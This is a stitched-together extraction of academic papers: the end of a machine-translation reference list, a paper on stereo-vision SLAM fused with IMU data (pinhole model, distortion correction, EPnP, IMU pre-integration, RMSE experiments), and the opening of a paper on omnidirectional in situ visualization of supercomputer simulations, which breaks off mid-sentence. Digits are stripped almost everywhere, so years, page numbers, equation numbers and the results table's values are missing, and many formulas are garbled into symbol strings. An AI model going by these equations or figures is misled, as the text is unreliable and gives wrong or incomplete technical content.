in proceedings of the th international confer- ence on computational linguistics (coling), pages – , osaka, japan. ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n gomez, Łukasz kaiser, and illia polosukhin. . attention is all you need. in advances in neural information processing systems, pages – . david vickrey, luke biewald, marc teyssier, and daphne koller. . word-sense disambigua- tion for machine translation. in proceedings of the conference on human language technology and empirical methods in natural language processing (hlt-emnlp), pages – , vancouver, bc, canada. lesly miculicich werlen, nikolaos pappas, dhananjay ram, and andrei popescu-belis. . self-attentive residual decoder for neural machine translation. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies (naacl-hlt), pages – , new orleans, la, usa. deyi xiong and min zhang. . a sense- based translation model for statistical machine translation. in proceedings of the nd annual meeting of the association for computational linguistics, pages – , baltimore md, usa. zhen yang, wei chen, feng wang, and bo xu. . multi-sense based neural machine trans- lation. in international joint conference on neural networks, pages – , anchorage, ak, usa. biao zhang, deyi xiong, jinsong su, and hong duan. . a context-aware recurrent encoder for neural machine translation. ieee/acm transactions on audio, speech and language processing (taslp), pages – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - improved stereo vision robot locating and mapping method yu haige school of computer science and engineering xi’an technological university xi’an, shaanxi, china e-mail: @qq.com yu fan school of computer science and engineering xi’an technological university xi’an, shaanxi, china e-mail: yffshun@ .com wei yanxi school of computer science and engineering xi’an technological university xi’an, shaanxi, china e-mail: @qq.com abstract—vision-based slam has an outstanding problem is not work when the camera fast motion, or camera operating environment characterized by scarce. aiming at this problem, this paper proposes a slam method of imu and vision fusion. this article uses a stereo camera to extract the image orb feature points. during the camera movement, if the number of extracted feature points is less than a certain threshold and the camera movement cannot be estimated or the estimated camera rotation and translation is greater than a certain threshold, the camera pose is estimated by fusing imu , otherwise use feature points to estimate camera pose. this paper uses non-linear optimization methods to perform pose estimation of pure feature points and pose estimation of fused imu, respectively. the experimental results show that binocular vision slam with imu information can estimate the camera pose more accurately. keyword-robot; imu; stereo vision; slam i. introduction with the development of robot technology, more and more robots are approaching our lives, such as sweeping robots, shopping mall robots, etc. mobile robots are the product of the cross fusion of various disciplines and technologies. among them, slam(simultaneous localization and mapping) is an important technology for mobile robots. slam means that the robot builds a map of the surrounding environment in real time based on sensor data without any prior knowledge, and infers its own positioning based on the map. 
from the s to the present, more and more sensors have been used in slam, from early sonar, to later d/ d lidar, to monocular, binocular, rgb-d, tof and other cameras. compared with lidar, cameras used in visual slam have become the focus of current slam research due to their advantages such as low price, light weight, large amount of image information, and wide application range. stereo cameras generally consist of two pinhole cameras placed horizontally. compared to monocular vision's scale uncertainty and pure-rotation problems, binocular cameras can directly calculate the pixel depth. at the same time, compared to rgb-d cameras, stereo cameras collect images directly from ambient light and can be used both indoors and outdoors. compared with lidar, the main disadvantage of the camera as a slam sensor is that when the camera moves too fast the images become blurred, and the camera does not work in scenes with insufficient environmental texture and few feature points. aiming at these problems of visual slam systems, this paper proposes an algorithm that fuses imu and slam. the fused imu provides a good initial pose for the system and, during camera movement, makes up for the shortcomings of visual slam, ensuring accurate camera pose estimation in the case of fast camera movement and lack of environmental texture.

ii. related works

a. camera coordinate system

camera models generally involve four coordinate systems: a pixel coordinate system, an image coordinate system, a world coordinate system, and a camera coordinate system.

figure : camera-related coordinate systems.

among them, o_w-x_w y_w z_w is the world coordinate system. the world coordinate system is the reference coordinate system in the visual slam system; the positions of the camera trajectory and of the map points are described in this coordinate system. its unit is m. o_i-xy is the image coordinate system. the image coordinate system takes the intersection of the camera optical axis and the image plane as its origin. its unit is mm. o_c-x_c y_c z_c is the camera coordinate system. the camera coordinate system takes the camera optical center as the origin; the directions parallel to the x-axis and y-axis of the image coordinate system are taken as the x_c-axis and y_c-axis, respectively, and the direction perpendicular to the image plane is the z_c-axis. its unit is m. o-uv is the pixel coordinate system. the origin of the pixel coordinate system is generally the upper-left corner of the image, with the u axis pointing right, parallel to the x axis, and the v axis parallel to the y axis. its unit is the pixel.

b. camera projection model

the camera maps points of the three-dimensional world onto the two-dimensional image plane. this process is generally described by a pinhole model. under the pinhole model, assume that there is a spatial point p with coordinates [x, y, z]^t. after projection through the pinhole o, the point p falls on the imaging plane o'-x'y', and the imaging point p' has coordinates [x', y', z']^t. let the distance from the imaging plane to the pinhole be the focal length f. according to the principle of similar triangles,

  z / f = x / x' = y / y'                                   ( )

so we can get:

  x' = f x / z,   y' = f y / z                              ( )

the difference between the pixel coordinate system and the imaging plane is a scaling and a translation of the origin. suppose that the pixel coordinates are scaled by α on the u axis and by β on the v axis, and that the origin is translated by [c_x, c_y]^t, so we can get:

  u = α x' + c_x,   v = β y' + c_y                          ( )

equation ( ) is substituted into equation ( ) to get:

  u = f_x x / z + c_x,   v = f_y y / z + c_y                ( )

where f_x = α f and f_y = β f. the unit of f is m and the unit of α and β is pixel/m, so the unit of f_x and f_y is the pixel. written as a matrix:

  z * [u]   [ f_x   0   c_x ] [x]
      [v] = [  0   f_y  c_y ] [y]   ≡ k p                   ( )
      [1]   [  0    0    1  ] [z]

among them, the matrix k is called the internal parameter matrix of the camera, and p is the coordinate representation of the space point in the camera coordinate system. let the coordinate p of the space point in the camera coordinate system correspond to the coordinate p_w in the world coordinate system; using the coordinate transformation we obtain:

  z p_uv = z [u, v, 1]^t = k (r p_w + t) = k t p_w          ( )

among them, t, built from the rotation r and the translation t, represents the pose of the camera relative to the world coordinate system and can also be called the external parameter of the camera. in summary, the pinhole camera model uses the similar-triangle relationship to obtain the relationship between space points and pixels, and it is a relatively idealized model. in practice, there are errors in the manufacture and installation of optical lenses, which affect the propagation of light during imaging and cause distortion in the images collected by the camera. here we mainly consider radial distortion and tangential distortion. radial distortion is caused by the shape of the lens, and the distortion increases as the distance between a pixel and the center of the image increases. therefore, a polynomial function can be used to describe the change before and after distortion; that is, quadratic and higher-order polynomial functions of the distance between the pixel and the image center can be used for correction. the coordinate change before and after radial distortion correction is as follows:

  x_corrected = x (1 + k_1 r^2 + k_2 r^4 + k_3 r^6)
  y_corrected = y (1 + k_1 r^2 + k_2 r^4 + k_3 r^6)         ( )

among them, [x, y]^t are the coordinates of the uncorrected point, and [x_corrected, y_corrected]^t are the coordinates of the point after the distortion is corrected. r is the distance from the point (x, y) to the origin. k_1, k_2 and k_3 are the three radial distortion parameters; usually these three parameters can be obtained in the calibration step. tangential distortion arises because the lens and the imaging plane cannot be kept strictly parallel during camera assembly. tangential distortion can be corrected using two additional parameters, p_1 and p_2:

  x_corrected = x + 2 p_1 x y + p_2 (r^2 + 2 x^2)
  y_corrected = y + p_1 (r^2 + 2 y^2) + 2 p_2 x y           ( )

considering the two types of distortion together, we can find the correct position of a pixel in the pixel coordinate system through the distortion coefficients:

  x_corrected = x (1 + k_1 r^2 + k_2 r^4 + k_3 r^6) + 2 p_1 x y + p_2 (r^2 + 2 x^2)
  y_corrected = y (1 + k_1 r^2 + k_2 r^4 + k_3 r^6) + p_1 (r^2 + 2 y^2) + 2 p_2 x y    ( )

in summary, the parameters describing the camera model mainly include the camera's internal parameter matrix and the distortion correction parameters.

c. stereo camera ranging principle

the binocular camera generally consists of two pinhole cameras placed horizontally, and the two cameras observe an object together. the aperture centers of both cameras lie on one axis, and the distance between them is called the baseline b of the binocular camera. consider a space point p that is imaged in both the left-eye and the right-eye camera; the two images are denoted p_l and p_r. due to the presence of the camera baseline, these two imaging positions are different. denoting the horizontal coordinates of the left and right images as u_l and u_r, the similarity of triangles gives:

  (z - f) / z = (b - u_l + u_r) / b                         ( )

we can get:

  z = f b / d,   with the disparity d = u_l - u_r           ( )

the above is an idealized model that explains the principle by which a binocular camera measures the depth of an actual three-dimensional point. in practical applications, due to factors such as manufacturing and installation, it is difficult to guarantee that the imaging planes of the two cameras lie strictly in the same plane and that the optical axes are strictly parallel. therefore, before using a binocular camera for measurement, it should be calibrated to obtain the internal parameters of the left and right cameras and the relative pose between them.

iii. pose estimation algorithm

at present, fusion methods for a monocular vision sensor and an imu can be divided into two types: loose coupling and tight coupling[ ]. loose coupling treats the vision sensor and the imu as two separate modules, each of which can compute pose information, and then fuses them with an ekf[ ] or a similar filter. tight coupling refers to jointly optimizing the vision and imu data in a non-linear optimization to obtain the pose estimates. because tight coupling can make full use of each sensor's data, this paper uses tight coupling to fuse vision and imu data. firstly, the purely visual feature-point pose estimation method is used to estimate the camera pose. then, during camera movement, if the number of extracted feature points is less than a certain threshold, the camera motion cannot be estimated, or the estimated camera rotation and translation are greater than a certain threshold, the camera pose is estimated by fusing the imu; otherwise, feature points are still used to estimate the camera pose.

a. pose estimation using pure visual information

the orb (oriented fast and rotated brief) algorithm was proposed by ethan rublee et al. in [ ]. the orb feature is composed of the fast keypoint and the brief descriptor; it adds orientation and scale invariance to the fast feature, and features are described using binary brief descriptors. when performing feature matching, the descriptors of feature points are compared. given a known pixel match between the left and right camera images, the binocular camera can directly obtain the corresponding d position of the pixel. therefore, a stereo-camera-based slam system can use known d points and their projection matches in the current frame to obtain the current camera pose, without the need to solve the camera motion using epipolar geometry[ ]. this paper first uses the epnp method[ ] to solve for the camera pose. the epnp pose solution method can use the matching-point information effectively, and the camera pose is then iteratively optimized.
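to make the camera model and stereo ranging relations of section ii concrete, the following numpy sketch (an illustration only; the intrinsic and distortion values are placeholders, not the calibration of the camera used in this paper) projects a camera-frame point to pixel coordinates, applies the radial and tangential correction, and recovers depth from the left–right disparity.

```python
# Illustrative sketch of the relations in section ii (placeholder parameters).
import numpy as np

K = np.array([[700.0,   0.0, 320.0],     # fx,  0, cx
              [  0.0, 700.0, 240.0],     #  0, fy, cy
              [  0.0,   0.0,   1.0]])

def project(point_cam, K):
    """Pinhole projection: z * [u, v, 1]^T = K * [x, y, z]^T."""
    uvw = K @ point_cam
    return uvw[:2] / uvw[2]

def undistort_normalized(x, y, k1, k2, k3, p1, p2):
    """Radial + tangential correction on normalized image coordinates."""
    r2 = x * x + y * y
    radial = 1 + k1 * r2 + k2 * r2**2 + k3 * r2**3
    x_c = x * radial + 2 * p1 * x * y + p2 * (r2 + 2 * x * x)
    y_c = y * radial + p1 * (r2 + 2 * y * y) + 2 * p2 * x * y
    return x_c, y_c

def stereo_depth(u_left, u_right, f, baseline):
    """Depth from disparity: z = f * b / d, with d = u_left - u_right."""
    d = u_left - u_right
    return f * baseline / d if d > 0 else float("inf")

if __name__ == "__main__":
    p_cam = np.array([0.5, -0.2, 4.0])            # a point in the camera frame (m)
    print("pixel coordinates:", project(p_cam, K))
    print("corrected coords:", undistort_normalized(0.1, -0.05,
                                                    k1=-0.3, k2=0.1, k3=0.0,
                                                    p1=0.001, p2=-0.0005))
    print("depth from disparity [m]:", stereo_depth(400.0, 382.5, f=700.0, baseline=0.12))
```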
epnp is known as the coordinates  , , ,...,wip i n of n space points in the world coordinate system and their corresponding coordinates  , , ,...,cip i n in the image coordinate system to solve the rotation matrix r and translation vector t of the camera movement.set four non-coplanar virtual control points in the world coordinate system, whose homogeneous sitting marks are:  | , , , wic i  .the relationship between the world coordinates of the space points and the control points is as follows:  , w w i ij j ij j j p c with          once thevirtual control point is determined and the premise that the four control points are not coplanar,  , ,..., ij j  is the only one determined.in the image coordinate system, the same weighting sum relationship exists: c c i ij j j p c    substituting equation ( ) into the camera model gives:  , c i x x j c c c i i i j y y ij j j j c j u f c x i s v p c f c y z                                   k k  the image coordinates , i i u v in equation ( ) are known, so:  c i ij j j s z      from equations ( ) and ( ):  ( ) ( ) c c ij x j ij x i j j c c ij y j ij y i j j f x c u z f y c v z                       in order to obtain the coordinates of the d point into the camera coordinate system, it is assumed that ij  in the camera coordinate system is consistent with ij  in the world coordinate system, that is, to find the rotation and translation of the four control points. solve linear equations:  mx   among them, m is a n matrix, and [ , , , ] ct ct ct ct c c c cx is a vector composed of unknowns to be solved.  n i i i v   x   international journal of advanced network, monitoring and controls volume , no. , i v is the right singular vector of m, and the corresponding singular value is . solve the tm m eigen value and eigenvector. the eigenvector with eigenvalue of is i v . n is the dimension of the t m m space, and i  is the coefficient to be determined. depending on the position of the reference point, the spatial dimension of the matrix tm m may take the values , , , . according to the same distance between the control points in the world coordinate system and the camera coordinate system, six constraints can be obtained, and the pending coefficients can be solved. when n = , according to the constraints:      i j w w i j v v c c      and so:  [ ] [ ] [ , ] [ , ] [ ] [ ] [ , ] [ , ] i j w w i ji j i j i j v v c c v v            when n = :  [ ] [ ] [ ] [ ] ( ) i i j j w w i j v v v v c c         since  and  only appear in the equation as quadratic terms, let [ , , ] t    β , and use the vector ρ to represent all w w i j c c , thus obtaining the equation:  lβ = ρ   where l is a  matrix composed of v and v . when n = , l is a  matrix. in summary, the coordinate solution of the reference point in the camera coordinate system can be obtained as the initial value of the optimization, the optimization variable is [ , ,..., ] t n   β , and the objective function is:  ( , ) . . ( ) ( ) c c w w i j i j i j s t i j error c c c c     β   optimize β corresponding to the smallest dimension of the error, get the vector x , and restore the coordinates of the control point in the camera coordinate system. at the same time, the coordinates of the reference point in the camera coordinate system are obtained according to the centroid coordinate coefficient. 
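as a small illustration of the centroid (barycentric) coefficients just mentioned, the sketch below (a simplified illustration, not the paper's implementation; point values are arbitrary) computes the coefficients α_j of one world point with respect to four non-coplanar control points and checks that they sum to one. because these coefficients are assumed to be the same in the camera coordinate system, they link the unknown camera-frame control points to the camera-frame positions of the reference points.

```python
# Simplified illustration of the epnp control-point representation:
# p^w = sum_j alpha_j * c_j^w  with  sum_j alpha_j = 1.
import numpy as np

def barycentric_coords(p_w, controls_w):
    """Solve for alpha such that p_w = sum_j alpha_j * c_j and sum_j alpha_j = 1.

    controls_w: (4, 3) array of non-coplanar control points in world coordinates.
    """
    A = np.vstack([controls_w.T, np.ones((1, 4))])   # 4x4 system: rows x, y, z, 1
    b = np.append(p_w, 1.0)
    return np.linalg.solve(A, b)

if __name__ == "__main__":
    controls = np.array([[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1]], dtype=float)
    p = np.array([0.3, 0.2, 0.4])
    alpha = barycentric_coords(p, controls)
    print(alpha, alpha.sum())                        # coefficients and their sum (= 1)
    print(np.allclose(alpha @ controls, p))          # reconstructs the original point
```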
finally, according to the coordinates of a set of point clouds in the two coordinate systems, the pose transformations of the two coordinate systems are obtained. the solution steps are as follows: a) find the center point:  , c w i ic w c c p p p p n n       b) to the center point:  , c c c w w w i i c i i c q p p q p p      c) calculate the h matrix:  t n c w i i i q q   h   d) svd decomposition of h matrix:  t  h u v   e) calculate the rotation r:  t r uv   if r < , then r( ,.) =-r( , ). international journal of advanced network, monitoring and controls volume , no. , f) calculate displacement t:  c w t p p  r   taking the results of epnp solution as initial values, the method of g o was used to optimize the pose of the camera nonlinearly. construct the least squares problem and find the best camera pose:  * ^ arg min exp( ) n i i i i u k p s        among them, i u is the pixel coordinates of the projection point, k is the camera internal reference,  is the camera pose, and i p is the space point coordinate. b. camera pose estimation method based on imu the measurement frequency of the imu is often higher than the frequency at which the camera collects pictures. for example, the binocular camera used in this article has a frame rate of up to fps and an imu frequency of up to hz. the difference in frequency between the two results in multiple imu measurements between the two frames. therefore, in order to ensure the information fusion of the two sensors, it is necessary to pre-integrate [ ] the data of the imu. that is, only the imu information between the two image moments is integrated to obtain the relative pose value, and the integration result is saved for later joint optimization.the imu-based camera pose estimation method mainly includes three coordinate systems: the world coordinate system, the imu coordinate system, and the camera coordinate system. all pose and feature point coordinates are finally expressed in the world coordinate system. during the calculation process, this article will convert the state quantity in the camera coordinate system to the imu coordinate system, and then to the world coordinate system.in this article, the letter w is used to represent the world coordinate system, the letter b is used to represent the imu coordinate system, wb r is used to represent the rotation matrix from the imu coordinate system to the world coordinate system, and wb p is used to represent the translation matrix from the imu coordinate system to the world coordinate system. the acceleration and angular velocity of the imu are:  ( ) ( ) ( ) ( ) a ( ) ( )( a( ) ) ( ) ( ) g g b wb b wb t a a b wb wb w w t t b t t t r t t g b t t              among them, ( )ab t and ( )gb t represent the bias of the accelerometer and gyroscope respectively, ( )a t and ( )g t represent the noise of the accelerometer and gyroscope respectively, and w g represents the gravity vector in the world coordinate system. 
the derivatives of rotation, velocity, and translation are expressed as:  ^ wb wb b wb w wb w wb w wb w wb r r v a p v      the rotation, speed and translation in the world coordinate system can be obtained by the general integral formula:  ( ) ( ) ( ( ) ) ( ) ( ) a( ) ( ) ( ) ( ) a( ) t t wb wb b wb t t t w w w t t t t t w w w w t t r t t r t exp d v t t v t d p t t p t v d d                               use equation ( ) in discrete time for euler integration: international journal of advanced network, monitoring and controls volume , no. ,  ( ) ( ) ( ( ) ) ( ) ( ) a( ) ( ) ( ) ( ) a( ) wb wb b wb w w w w w w w r t t r t exp t t v t t v t t t p t t p t v t t t t                   the imu model is obtained from equations ( ) and ( ): ( ) ( ) (( ( ) ( ) ( ) ) ( ) ( ) ( )(a( ) ( ) ( )) ( ) ( ) ( ) ( )(a( ) ( ) ( )) g gd a ad a ad r t t r t exp t b t t t v t t v t g t r t t b t t t p t t p t v t t g t r t t b t t t                               suppose there are two image frames with time i t and j t , j i t t . therefore, the imu's pre-integration observation model is:  ( ) ( ) ( ) t ij i j ij t ij i j i ij ij t ij i j i i ij ij ij r r r exp v r v v g t v p r p p v t g t p                      among them, a, b, and c are the noise terms of the rotation amount, the pre-integrated speed noise term, and the pre-integrated translation noise term, respectively. for the pose between two adjacent frames, this paper still uses a nonlinear optimization method to fuse imu information and visual information. among them, the state quantities that need to be optimized are:   , , , ,j j j j jwb w b w b g ar p v b b    in equation ( ), j wb r , j wb v , and j wb p are the rotation, velocity, and translation of the imu coordinate system relative to the world coordinate system at time i, and the random walk bias of the gyroscope and accelerometer at time i, respectively. therefore, the optimal state quantity  is solved by optimizing the visual reprojection error and the imu measurement error:  * ( , arg min( + ( , )) proj k j imu k e e i j     )   c. experimental design the upper computer of the experimental platform in this article is a laptop with ubuntu . version, running memory is g, processor model is core i u, and the main frequency is . ghz. the robot platform is a dashgo d robot mobile platform that supports the ros development system. the overall size is   and the diameter of the driving wheel is mm. the binocular camera sensor used is mynt eye d -ir- /color. the experiments in this paper are mainly aimed at the positioning accuracy of the robot. the evaluation index is the rmse (root-mean-square-error) of the robot position:  ˆ( ) n i i i rmse p p n      where ˆ i p is the estimated robot position and i p is the actual robot position. figure . robot straight driving positioning experiment international journal of advanced network, monitoring and controls volume , no. , in this paper, robot positioning experiments are performed in corridor environments with insignificant environmental characteristics and indoor environments with rich characteristics. in a corridor environment, a mobile robot is used to carry experimental equipment to travel at a constant speed of m in the positive direction of the camera, and then the positioning accuracy of pure vision and the positioning accuracy of vision fusion imu are recorded separately. 
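the euler-integration update described above propagates the imu state between two camera frames. a minimal sketch of one discrete propagation step is given below (a simplified illustration, not the paper's implementation; the gyroscope and accelerometer biases are assumed to be already subtracted, and scipy's rotation class is used for the exponential map).

```python
# One discrete IMU propagation step (simplified; biases already subtracted).
import numpy as np
from scipy.spatial.transform import Rotation

GRAVITY_W = np.array([0.0, 0.0, -9.81])   # gravity in the world frame (assumption)

def propagate_imu(R_wb, v_w, p_w, acc_b, gyro_b, dt):
    """Euler integration of rotation, velocity and position in the world frame."""
    R_next = R_wb @ Rotation.from_rotvec(gyro_b * dt).as_matrix()   # R <- R Exp(w dt)
    acc_w = R_wb @ acc_b + GRAVITY_W                                # body accel to world
    v_next = v_w + acc_w * dt
    p_next = p_w + v_w * dt + 0.5 * acc_w * dt * dt
    return R_next, v_next, p_next
```

the evaluation metric is the root-mean-square error of the robot position, rmse = sqrt((1/n) * sum_i ||p̂_i - p_i||^2), which can be computed as in the following helper (variable names are ours, not taken from the paper's code).

```python
import numpy as np

def position_rmse(estimated, ground_truth):
    """RMSE between estimated and ground-truth robot positions, both (n, 3) arrays."""
    diff = np.asarray(estimated, dtype=float) - np.asarray(ground_truth, dtype=float)
    return float(np.sqrt(np.mean(np.sum(diff ** 2, axis=1))))
```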
in a feature-rich indoor environment, a robot linear experiment was also performed to make the mobile robot move forward at a constant speed of m in the positive direction of the camera, but the speed was . times that of the previous experiment. perform multiple experiments and record the results. table i. experimental result robot operating environment pure visual rmse/m visual fusion imu rmse/m low-texture corridor environment . . feature-rich environment . . from the experimental results, it can be seen that the stereo vision positioning error of the fusion imu is less than the pure vision positioning error, which indicates that the visual positioning of the robot with the fusion imu is more accurate than the vision-only positioning in low-texture environments and fast robot movements. degree. iv. conclusion in this paper, the robot positioning technology in the robot system is researched, and a binocular vision fusion imu-based robot positioning method is proposed. compared with the pure vision robot localization method, the proposed method is more robust in low-textured environments and fast robot movements. the experimental results show that the visual positioning method integrated with imu solves the defects of pure visual positioning to a certain extent and improves the positioning accuracy of the robot. reference [ ] agostino martinelli. closed-form solution of visual-inertial structure from motion[j]. international journal of computer vision, , ( ): - . [ ] smith r c, cheeseman p. on the representation and estimation of spatial uncertainty[j]. international journal of robotics research, , ( ): - . [ ] rublee e, rabaud v, konolige k, et al. orb: an efficient alternative to sift or surf[c]// international conference on computer vision. ieee, . [ ] gao xiang, zhang tao. fourteen lectures on visual slam [m]. beijing: publishing house of electronics industry, . [ ] v. lepetit, f. moreno-noguer, p. fua. epnp:an accurate o(n) solution to the pnp problem[j]. international journal of computer vision, , ( ): - . [ ] forster c, carlone l, dellaert f, et al. on-manifold preintegration for real time visual--inertial odometry[j]. ieee transactions on robotics, , ( ): - . d street view: a video-based visualization method d street view: a video-based visualization method akira kageyama and naohisa sakamoto graduate school of system informatics, kobe university, kobe, japan abstract we propose a new visualization method for massive supercomputer simulations. the key idea is to scatter multiple omnidirectional cameras to record the simulation via in situ visualization. after the simulations are complete, researchers can interactively explore the data collection of the recorded videos by navigating along a path in four-dimensional spacetime. we demonstrate the feasibility of this method by applying it to three different fluid and magnetohydrodynamics simulations using up to , omnidirectional cameras. subjects scientific computing and simulation, visual analytics keywords scientific visualization, high performance computing, computer simulation, in situ visualization, video-based visualization, omnidirectional visualization, multi-viewpoint visualization, interactive exploration of video dataset, new method for visualization of supercomputer simulations introduction visualization is indispensable to comprehend the time development of complex phenomena captured as numerical data by supercomputer simulations. 
for three- dimensional ( d) fluid flow simulations, for example, pressure, velocity, vorticity, and other d fields are saved for post-hoc exploratory visualization. it is commonplace to save d fields without thinning out to maintain the spatial resolution of the simulation. in contrast, it is uncommon to store d fields without thinning them out in the temporal dimension, and the d data are usually output after very long intervals of time. if one attempts to save all the d fields within very short intervals, the numerical data will flood the disk space of the supercomputer system. the temporal thinning before the visualization often necessitates the discarding of valuable information. this situation will not improve in the future, but will most likely worsen as supercomputer technology advances. we overcome the above-mentioned problems using our new in situ visualization method, wherein visual recordings are made using the supercomputer system during simulation. because the recorded images are two-dimensional ( d), the data size is naturally smaller—a compression of the raw d data whereof the image is produced. in addition, lossless compression algorithms based on arithmetic coding are also available to reduce the size of the recordings even further. in situ visualization already plays an essential role in large-scale simulations (ma et al., ; ross et al., ; ma, ; childs et al., ). major application programs for general-purpose visualization are now armed with in situ libraries or tools, such as catalyst (ayachit et al., ) for paraview and libsim (whitlock, favre & meredith, ) for how to cite this article kageyama a, sakamoto n. . d street view: a video-based visualization method. peerj comput. sci. :e doi . /peerj-cs. submitted april accepted september published november corresponding author akira kageyama, kage@port.kobe-u.ac.jp academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright kageyama and sakamoto distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:kage@�port.�kobe-u.�ac.�jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ visit. these applications have been developed based on visualization tool kit (vtk) (schroeder, martin & lorensen, ). opengl is used for hardware-accelerated rendering in vtk when the graphics processing unit (gpu) is available. for a supercomputer system without gpus, opengl functions can be executed using osmesa. software optimization technology, such as simd extension instructions for software rasterization processing, are included in osmesa. based on those technologies, a high-quality rendering framework, such as embree (wald et al., ) and ospray (wald et al., ), capable of executing rendering processing at high speeds have been developed. to execute the in situ visualization process efficiently on the supercomputing system, an adaptable data i/o framework called as adios (lofstead et al., ) has been developed. adios provides a simple and flexible approach for data transmission, including asynchronous communication between the simulation and visualization processes (wang et al., ; kress et al., ). a generic in situ interface sensei (ayachit et al., ) provides simulation researchers with portable interface for other in situ infrastructure such as catalyst, libsim, and ospray. 
a shortcoming of conventional in situ visualizations is that they deprive users of interactive control. here, interactive control means that users can, in real time, change visualization-related settings, such as the viewing position and direction. the interactivity also includes the capability to change the visualization method (e.g., from isosurface to volume rendering) applied to the target data and to tune the related parameters. in the conventional in situ visualization method, one has to resubmit the same simulation job to obtain a different visualization setting, for example, volume renderings from a different point of view. there are several proposals to incorporate the interactivity into in situ visualization. kawamura, noda & idomura ( ) developed an in situ visualization method that is an extension of the particle-based rendering method (sakamoto et al., ) to the concurrent in situ visualization. in the particle-based rendering method, a dataset, represented as a set of particles, is produced by simulation. the particle dataset, whose size is much smaller than the raw numerical data, is transmitted to computer system for visualization with gpus and interactively visualized. tikhonova, correa & ma ( a) and tikhonova, correa & ma ( b) proposed “proxy image” method to realize interactive volume rendering by making use of intermediate representation of the data. this method was extended to the in situ visualization by ye, miller & ma ( ). matthes et al. ( ) developed in situ library isaac for supercomputer simulations, by which users can interactively analyze data without the deep copy. in our previous article (kageyama & yamada, ), we proposed an interactive in situ visualization method, in which we place visualization cameras on a spherical surface that covered the target region, as is schematically shown by the small circles in fig. a. the simulation results are rendered with several visualization methods and parameters from the multiple viewpoints in the d space. because the cameras focus on a point in the simulation region, as suggested by the arrows in the figure, we can observe the structures and dynamics in the simulation from various directions. the sequence of images are complied as videos that are indexed with the camera locations, before applying kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interactive analysis of the video collection with dedicated exploratory visualization software. this method can be regarded as an application of the image-based rendering (shum & kang, ) in computer graphics to the scientific visualization. in the image-based rendering, an image viewed from a specified point is calculated from images taken from different view points. among various approaches to image-based rendering, our approach is closer to “light field rendering” (levoy & hanrahan, ), where new images are generated only through the image, not through the geometry data. ahrens et al. ( ) also developed the image-based in situ visualization method and implemented as cinema viewer, which is applied to various simulations (o’leary et al., ; banesh et al., ). because in situ visualization can produce a large number of images at fine time intervals, it is natural to save the sequence of images taken from a single camera as a single video file. a video file has an advantage over still images, that is, we can apply advanced video compression technology to it. 
the small storage requirement of a compressed video file allows us to save a large number of them (berres et al., ), within the same disk space for storing raw numerical data. therefore, we can set numerous visualization cameras with different visualization settings. an increased number of video capturing virtual cameras implies an increased usage of the supercomputing resources, besides those necessary for the simulation. however, we note that it is not uncommon that only a portion of the available computing resources are utilized by a single simulation, even when the simulation code is highly optimized. in other words, the computing resource capacity of today’s supercomputer system is much larger than is being utilized by simulations. thus, it would be quite appropriate to use surplus processor cores for our in situ visualization. a natural extension of our previous approach (kageyama & yamada, ) is to place the visualization cameras all over the simulation region, that is, not only around it but also inside the region, as is schematically shown by the small circles in fig. b. an apparent problem in this d distribution of the visualization cameras is that we cannot specify the view-direction of each camera when we have no a priori knowledge of the locations to be focused on. to resolve this problem, we propose in this article to use omnidirectional visualization cameras that have the full (= p steradian) solid view angle, as suggested by the arrows in fig. b. if we could scatter such cameras all over the simulation region, almost all, if not all, occurring phenomena would be recorded by some nearby cameras. figure schematically shows the concept of the proposed method. we place lots of omnidirectional cameras (blue spheres in fig. a). each camera produces a sequence of omnidirectional images, and we store them as a video file. when we place c cameras and apply v kinds of visualizations on each of them, we obtain c × v video files in total as a result of simulation (fig. b). after the simulation, it is possible to pick up one or more of the video files and play it on a pc with a commonly available video player. although, the displayed images are distorted because they are captured by omnidirectional cameras. supposing that the picked-up video is recorded by the c-th camera ( ≤ c < c) for the v-th visualization kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ method ( ≤ v < v), herein referred to as movc,v, what the common video player does is to extract the sequence of images in movc,v and presents them on the pc’s screen one after another. in the “virtual museum” by miller et al. ( ), the viewer interactively specifies the video to be played at one time. an important function in our method is that we extract a sequence of still images from different video files, such as movc ,v, movc ,v, movc ,v, ⋯, as denoted by the magenta arrows connecting figs. a and b. the extracted sequence of figure visualization cameras (small white circles) and simulation boundary (rectangle). (a) in our previous article (kageyama & yamada, ), we placed the cameras on a spherical surface around the simulation region. arrows represent the viewing direction. all the cameras are focusing on a point in the simulation region. (b) in the present article, we propose to place omnidirectional cameras all over the simulation space. each camera records the full solid view angle. full-size doi: . /peerj-cs. 
/fig- figure concept of d street view. (a) we place lots of omnidirectional cameras (blue spheres) in the simulation space and apply in situ visualization with them. (b) each camera records the time develop- ment of the simulation viewed from its position with p steradian and the omnidirectional images are compiled as a video. the video files are tied with the position data, and they constitute a video data collection. (c) a dedicated application program extracts a sequence of images from the video data collection as a smooth (regular, not omnidirectional) video on a pc window. the user interactively specifies the position, direction, and time (or frame) to extract images from the data collection. full-size doi: . /peerj-cs. /fig- kageyama and sakamoto ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the images is presented as a video by a dedicated application program (see fig. c). the program excerpts a partial field-of-view around a user-specified direction from the omnidirectional image. the user’s experience is similar to walking around a specific region of interest. we can also switch the currently applied visualization method, for instance, from va to vb, by exchanging the input video file from movc,va to movc,vb. this switching experience is almost the same as that of standard post-hoc visualizations. the difference, however, being that the exchange is quick in our method even if the switched visualization method vb is a computationally heavy one. the rendering has already been done on the supercomputer. we can abstractly think of the video data collection as a set of videos with captured events from and within the simulation space. (we consider d simulations in this article). since a video itself is a dataset of still images that are sequentially ordered in time, we can also regard the video data collection as a set of still images that are distributed in d spacetime. this data collection is a 